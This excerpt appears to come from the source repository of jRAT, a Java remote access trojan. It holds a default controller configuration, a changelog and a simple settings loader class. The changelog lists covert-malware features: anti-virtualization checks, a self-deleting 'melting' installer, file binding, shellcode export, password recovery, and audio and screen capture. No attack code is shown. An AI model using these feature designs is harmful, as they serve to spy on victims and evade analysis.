Controller/SETTINGS.md
# Settings

Settings are saved in ```./files/settings.json```

Do not modify these if you don't know what you're doing.


### Default configuration

```json
{
  "hosts":[],
  "build_id":"Client",
  "build_password":"swCWCp06FQeUhSp+ToWo7Q==",
  "reconnect_rate":15,
  "use_tray_icon":true,
  "track_statistics":true,
  "installation_name":"File",
  "start_remote_screen_directly":false,
  "request_dialog":true,
  "maximum_connections":-1,
  "use_country_db":true,
  "transfer_plugins_on_connect":false,
  "row_height":30,
  "proxy":{
    "port":9050,
    "enabled":false,
    "host":"127.0.0.1",
    "socks":true
  },
  "columns":{
    "Operating System":true,
    "RAM":true,
    "User@Host":true,
    "IP/Port":true,
    "CPU":false,
    "Country":true,
    "Desktop Environment":false,
    "Status":true,
    "Network Usage":false,
    "Cores":false,
    "ID":true,
    "Headless":false,
    "Local Address":true,
    "Ping":true,
    "Version":true
  },
  "sockets":{
    "Socket2906":{
      "port":1336,
      "pass":"swCWCp06FQeUhSp+ToWo7Q==",
      "type":0,
      "timeout":15000
    }
  },
  "theme":null,
  "eula_shown":false
}
```

You can generate a new config file using the argument ```--dump-default-config <file>``` when running the Controller


CHANGELOG.md
# jRAT 5.2.1


### Released on 2016-03-13

- jrat.key may be in the root directory (or "files" folder as before)
- Download plugins without issues***


# jRAT 5.2


### Released on 2016-02-14

- Custom swing components moved to API so plugins can use them
- Fix sample slave display name
- Fix building error related to tray icon
- Fix plugin icons
- Detects if we did not exit correctly
- Detects protocol version so that we can ensure longer backwards compability
- Fix duplicate config entries
- Make sure extension is .jar before adding to startup
- jrat.theme system property
- Properly detects if plugin is installed
- Do not exit when requesting elevation (in case it fails, will result in duplicate connections)
- Raw configuration viewing in control panel removed
- Password Recovery plugin
- Darcula Theme plugin
***


# jRAT 5.1.3


### Released on 2016-01-05

- Fix hidden files on -nix not working correctly
- More safe file dropping (shell executing executables, running JARs with Java)
- graphslib updated
- Lite/Limited version removed
- Tray Icon is default in minimal builder
- Plugins transferred on connect will not be written to disk
- Do not try to load plugin main class from manifest
- Invokes onConnect() correctly on plugin transfer
- Fix headless errors (Do not show EULA frame if headless)
- If download fails, error will show correctly***


# jRAT 5.1.2


### Released on 2015-10-19

- Fixed flag issue that would cause the client to crash if no flag was found
- Return correct flag in sample mode
- Some country character fixes
- Only show monitor dialog if there is more than one monitor on the remote system
- Safer client detection in API
- Constant authentication domain
- Stub uses startuplib
- Do not update graphs if running headless
- Do not update sockets view if running headless
- Prevent loading of tray icon if running headless
- Do not update network graph if running headless
- Update 'help' command
- 'save' command added
- 'socket' command added
- ZKM automation removed
- Lite version tray messages changed
- Wipes encryption keys on start
***


# jRAT 5.1.1


### Released on 2015-07-31

Views
	
	- Can have more than one view (default is Table)
	- New view introduced, Boxes


- New version of swing-terminal, supports colors
- Listing processes now shows icons (Windows Vista and above only)
- Fix minimal builder making advanced builder not open
- Anti virtualization now detects disk with space less than 50 GB
- C/C++ shellcode exporting fixed
- Binding fixed
- Install message will not block execution of client
- Multiline install message
- Client will not break if any property contains a newline character
- .app properties dialog fixed
- EULA countdown removed
- --nomenubar argument, can be used to run jRAT if it can't use the OS X native menu bar
- Fix frames not showing all components on OS X***


# jRAT 5.1


### Released on 2015-07-06

- Fix socket closing
- Remove sound and editor setting panels
- Fix settings about tree item
- No cells can be edited (if they shouldn't)
- Bigger packet space
- Tray icon fixed
- Tray icon tooltip displays network usage
- Sends time running to web panel
- Computer name is now called hostname
- Fix cursor drawing
- Remove log expanding
- Some work on running headless
- Doesn't stop loading plugin if one fails
- Fix bug where config would not be decrypted resulting in a crash on systems where the absolute path to the stub contains a space (Affected Windows XP)
- Network Usage column
- Fix network counter
- Fix network download speed***


# jRAT 5.1rc2


### Released on 2015-05-17

- Can run on headless systems (servers or computers without monitor, keyboard, mouse)
- Network monitor values correct
- Registry actions fixed & improved
- No duplicates in registry tree
- No errors if flag doesn't exist
- Shows country name in system info
- About dialog changed
- Stressing removed
- Removed unused progressbar in file transfer frame
- Stub V is renamed to Version
- Registry menu item only enabled if client is running Windows
- Uses pluginlib
- DNS rotator not switching to latest address in list fixed
- Obfuscated Key Exchanging
- Stops file searching if connection closes
- Can choose to not install stub

Detects the following operating systems
	
	- Lunar Linux
	- NixOS
	- Crux
	- BLAG
	- gNewSense
	- Dragora
	- Chapeau
***


# jRAT 5.1rc1


### Released on 2015-04-09

- Network usage panel working
- Updater updated
- Removes control panel from memory when closing
- Double click fixed in local file table
- SteamOS icon fixed
- Shows cleaner memory usage in remote processes
- Remote Shell fixed
- Sound listening and recording fixed
- Advanced Builder icon fix
- Viewing of environment variables fixed
- Restarting client is safer
- Assumes Java is in $PATH on OS X
- Main Frame now has better icon resolution
- New info icon
- Basic labels added to FrameAbout
- Picking monitor and viewing monitors thumbnails works correctly on multi monitor systems
- Remote Screen multiple monitor problem fixed
- Monitors in control panel now is in scale 1:10
- Can lower remote screen size without crashing
- Performance Frame removed
- Startup changes related to melting and "run at next boot"
- Run at next boot works on other systems than Windows only
- Melting installer fixed
- Runs uninstall script in correct shell
- Debug frame now contains more detailed operating system information
- Plugins frame is nicer
- Root node not visible in registry frame
- pathtree.jar updateed
- Uses iconlib.jar
- Not spawning multiple memory monitor threads
- Selecting ping icons removed
- Fixes to weird crashes on Arch Linux based distros (Maybe OpenBSD)

File Manager changes
	
	- Open current file in File Manager in search panel
	- Thumbnail preview is now a tab in File Manager
	- Search files is now a tab in File Manager


Transfers changes
	
	- Shows current file transfer speed
	- Fixed cancelling downloads
	- Transfers plugins concurrently
	- Fixed pausing downloads

Controller/src/se/jrat/client/settings/Settings.java
package se.jrat.client.settings;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.util.HashMap;
import java.util.Map;

import se.jrat.client.Globals;


public class Settings extends AbstractStoreable {

	private static final Settings instance = new Settings();

	private transient Map<String, Object> settings = new HashMap<String, Object>();

	public static Settings getGlobal() {
		return instance;
	}

	public String getString(String key) {
		Object obj = settings.get(key);
		return obj == null ? "" : (String) obj;
	}

	public Object get(String key) {
		return settings.get(key);
	}

	public int getInt(String key) {
		Object obj = settings.get(key);
		return obj == null ? -1 : (Integer) obj;
	}

	public boolean getBoolean(String key) {
		Object obj = settings.get(key);
		return obj == null ? false : obj.toString().equalsIgnoreCase("true");
	}

	public void setVal(String key, Object value) {
		settings.put(key, value);
	}

	public void load() throws Exception {
		try {
			BufferedReader reader = new BufferedReader(new InputStreamReader(new FileInputStream(getFile())));
			
			reader.readLine();
			int len = Integer.parseInt(reader.readLine());
			
			for (int i = 0; i < len; i++) {
				String data = reader.readLine();

				String[] split = data.split("=");
				
				if (split.length == 2) {
					String key = split[0];
					String rawValue = split[1];
					
					Object value = null;
					
					try {
						value = Integer.parseInt(rawValue);
					} catch (Exception ex) { }
					
					if (value == null) {
						value = rawValue;
					}
					
					settings.put(key, value);
				}
			}
	
			reader.close();
		} catch (Exception ex) {
			ex.printStackTrace();
		}
		
		if (settings.size() == 0) {
			addDefault();
		}
	}

	public void save() throws Exception {
		try {
			PrintWriter pw = new PrintWriter(new OutputStreamWriter(new FileOutputStream(getFile())));
			
			pw.println("jRAT settings");
			pw.println(settings.size());
			
			for (String s : settings.keySet()) {
				pw.println(s + "=" + settings.get(s).toString());
			}
			
			pw.close();
		} catch (Exception ex) {
			ex.printStackTrace();
		}
	}

	public void addDefault() {
		setVal("bip", "127.0.0.1");
		setVal("bport", 1336);
		setVal("bid", "Name");
		setVal("bpass", "pass");
		setVal("brecat", 10);
		setVal("traynote", true);
		setVal("stats", true);
		setVal("jarname", "File");
		setVal("remotescreenstartup", false);
		setVal("askurl", true);
		setVal("max", -1);
		setVal("geoip", true);
		setVal("proxy", false);
		setVal("proxyhost", "127.0.0.1");
		setVal("proxyport", 9050);
		setVal("proxysocks", true);
		setVal("plugintransfer", false);
		setVal("rowheight", 30);
	}

	@Override
	public File getFile() {
		return new File(Globals.getSettingsDirectory(), ".settings");
	}
}
